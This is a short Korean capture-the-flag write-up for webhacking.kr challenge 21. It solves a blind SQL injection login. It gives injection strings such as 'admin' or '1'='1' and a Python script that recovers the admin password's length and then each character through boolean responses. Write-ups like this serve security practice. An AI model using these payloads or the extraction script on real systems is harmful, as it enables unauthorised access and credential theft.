웹해킹 21번 (webhacking.kr old 21)

1. 공격유형 : Blind Sql Injection

2. Write up

Challenge 21 첫화면

guest 입력 시 "Login Success"

 

admin 입력 시 "Login Failed"

Injection 구문 삽입(admin' or '1'='1) 시 wrong passwd 출력 -> Blind Injection 수행

Injection 구문에 조건문 1개 추가 (admin' and length(id)=5 or '1'=0 ) -> and 조건문이 참일 시 wrong passwd 출력

admin pw의 길이 : 36

Blind Sql Injection 실행을 위해 스트립트 작성

import requests
s = requests.Session()

proxyList = {'http':'127.0.0.1:8000',
             'https':'127.0.0.1:8000'}

def login():
    
    url = 'https://webhacking.kr/login.php?login'
    login = {'id':'',
             'pw':''}

    response = s.post(url, data=login, proxies=proxyList, verify=False)
    response.status_code
    print (response.text)

def payload2():
    
    login(); TrustKey = "wrong password" ; code=''
    for i in range(1,50):
        url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin'+and+length(pw)={}+or+id='garbage&pw=123qwe".format(str(i))
        response = s.get(url, proxies=proxyList, verify=False)
        response.status_code
        res = response.text
        leng = i
    
        if(res.find(TrustKey)!=-1):
            print ("[-]Find Out Length Of ID : {}".format(str(leng)))
            break
            
    for i in range(1,leng+1):
        for j in range(65, 128):
            url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin'+and+ascii(substr(pw,{},1))='{}'+or+id='garbagek&pw=123qwe".format(str(i),str(j))
            response = s.get(url, proxies=proxyList, verify=False)
            response.status_code
            res = response.text
             
            if(res.find(TrustKey)!=-1):
                code = code + str(chr(j))
                print ("[-]Find Out Of ID : {}".format(str(code)))
                break
     
    print (code)
            
payload2()

Solve